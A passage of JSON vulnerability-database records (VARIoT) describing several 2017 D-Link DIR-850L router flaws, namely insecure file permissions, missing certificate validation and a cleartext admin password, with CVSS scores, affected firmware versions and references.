          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-31798",
            "trust": 0.6,
            "value": "LOW"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201709-567",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-105149",
            "trust": 0.1,
            "value": "LOW"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31798"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105149"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008103"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14428"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-567"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) and REV. B (with firmware through FW208WWb02) devices have 0666 /var/run/hostapd* permissions. The D-Link DIR-850L device firmware contains vulnerabilities related to authorization, permissions, and access control. Information may be obtained or altered, and service operation may be disrupted (DoS). D-Link DIR-850L REV.A and REV.B are both D-Link wireless router products. A security vulnerability exists in REV.A devices using FW114WWb07_h2ab_beta1 and earlier firmware and in REV.B devices using FW208WWb02 and earlier firmware. An attacker could exploit this vulnerability to obtain a wireless password.",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-14428"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008103"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-31798"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105149"
      }
    ],
    "trust": 2.25
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-14428",
        "trust": 3.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008103",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-567",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-31798",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-105149",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31798"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105149"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008103"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14428"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-567"
      }
    ]
  },
  "id": "VAR-201709-0599",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31798"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105149"
      }
    ],
    "trust": 1.7
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "IoT",
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31798"
      }
    ]
  },
  "last_update_date": "2023-12-18T13:43:58.924000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "DIR-850L",
        "trust": 0.8,
        "url": "http://support.dlink.com/productinfo.aspx?m=dir-850l"
      },
      {
        "title": "D-Link DIR-850L REV.A  and REV.B Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=100047"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008103"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-567"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-798",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-264",
        "trust": 0.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-105149"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008103"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14428"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-14428"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14428"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31798"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105149"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008103"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14428"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-567"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31798"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105149"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008103"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14428"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-567"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-27T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-31798"
      },
      {
        "date": "2017-09-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-105149"
      },
      {
        "date": "2017-10-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-008103"
      },
      {
        "date": "2017-09-13T17:29:00.837000",
        "db": "NVD",
        "id": "CVE-2017-14428"
      },
      {
        "date": "2017-09-18T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201709-567"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-27T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-31798"
      },
      {
        "date": "2019-10-03T00:00:00",
        "db": "VULHUB",
        "id": "VHN-105149"
      },
      {
        "date": "2017-10-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-008103"
      },
      {
        "date": "2023-11-17T19:59:23.433000",
        "db": "NVD",
        "id": "CVE-2017-14428"
      },
      {
        "date": "2019-10-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201709-567"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-567"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DIR-850L Vulnerabilities related to authorization, authority, and access control in device firmware",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008103"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "trust management problem",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-567"
      }
    ],
    "trust": 0.6
  }
}

VAR-201709-0591

Vulnerability from variot - Updated: 2023-12-18 13:38

The D-Link NPAPI extension, as used on D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) and REV. B (with firmware through FW208WWb02) devices, does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate. The D-Link DIR-850L device firmware contains a certificate validation vulnerability. Information may be obtained. D-Link DIR-850L REV.A and REV.B are both D-Link wireless router products. A security vulnerability exists in the D-Link NPAPI extension used in REV.A devices using FW114WWb07_h2ab_beta1 and earlier firmware and in REV.B devices using FW208WWb02 and earlier firmware. The vulnerability stems from the program failing to verify the X.509 certificate of the SSL server.


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201709-0591",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw208wwb02"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw114wwb07_h2ab_beta1"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "d link",
        "version": "fw114wwb07_h2ab_beta1"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "d link",
        "version": "fw208wwb02"
      },
      {
        "model": "rev.b \u003c=fw208wwb02",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-850l rev.b \u003c=fw208wwb02",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "fw114wwb07_h2ab"
      },
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "fw208wwb02"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31789"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008139"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14420"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-575"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "fw114wwb07_h2ab_beta1",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "fw208wwb02",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-14420"
      }
    ]
  },
  "cve": "CVE-2017-14420",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 4.3,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2017-14420",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2017-31789",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "VHN-105141",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:M/AU:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.9,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 2.2,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "High",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 5.9,
            "baseSeverity": "Medium",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2017-14420",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2017-14420",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-31789",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201709-575",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-105141",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31789"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105141"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008139"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14420"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-575"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The D-Link NPAPI extension, as used on D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) and REV. B (with firmware through FW208WWb02) devices, does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate. D-Link DIR-850L There is a certificate validation vulnerability in the device firmware.Information may be obtained. D-LinkDIR-850LREV.A and REV.B are both D-Link wireless router products. A security vulnerability exists in the D-LinkDIR-850LREV.A using FW114WWb07_h2ab_beta1 and previous firmware and the D-LinkNPAPI extension used in the REV.B device using FW208WWb02 and previous firmware. The vulnerability stems from the program failing to verify the X of the SSL server. 509 certificate",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-14420"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008139"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-31789"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105141"
      }
    ],
    "trust": 2.25
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-14420",
        "trust": 3.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008139",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-575",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-31789",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-105141",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31789"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105141"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008139"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14420"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-575"
      }
    ]
  },
  "id": "VAR-201709-0591",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31789"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105141"
      }
    ],
    "trust": 1.7
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "IoT",
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31789"
      }
    ]
  },
  "last_update_date": "2023-12-18T13:38:52.801000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "DIR-850L",
        "trust": 0.8,
        "url": "http://support.dlink.com/productinfo.aspx?m=dir-850l"
      },
      {
        "title": "D-Link DIR-850L REV.A  and REV.B Security vulnerabilities",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=235002"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008139"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-575"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-295",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-105141"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008139"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14420"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-14420"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14420"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31789"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105141"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008139"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14420"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-575"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31789"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105141"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008139"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14420"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-575"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-27T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-31789"
      },
      {
        "date": "2017-09-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-105141"
      },
      {
        "date": "2017-10-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-008139"
      },
      {
        "date": "2017-09-13T17:29:00.493000",
        "db": "NVD",
        "id": "CVE-2017-14420"
      },
      {
        "date": "2017-09-19T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201709-575"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-27T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-31789"
      },
      {
        "date": "2017-09-21T00:00:00",
        "db": "VULHUB",
        "id": "VHN-105141"
      },
      {
        "date": "2017-10-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-008139"
      },
      {
        "date": "2023-11-17T19:58:23.067000",
        "db": "NVD",
        "id": "CVE-2017-14420"
      },
      {
        "date": "2023-04-27T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201709-575"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-575"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DIR-850L Vulnerability related to certificate validation in device firmware",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008139"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "trust management problem",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-575"
      }
    ],
    "trust": 0.6
  }
}

VAR-201709-0589

Vulnerability from variot - Updated: 2023-12-18 13:34

The D-Link NPAPI extension, as used in conjunction with D-Link DIR-850L REV. B (with firmware through FW208WWb02) devices, sends the cleartext admin password over the Internet as part of interaction with mydlink Cloud Services. The D-Link DIR-850L device firmware contains a vulnerability related to certificate and password management. Information may be obtained or altered, and service operation may be disrupted (DoS). The D-Link DIR-850L REV. B is a wireless router from D-Link. A security vulnerability exists in the D-Link NPAPI extension used in DIR-850L REV. B devices with firmware FW208WWb02 and earlier. An attacker could use this vulnerability to retrieve an administrator password.


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
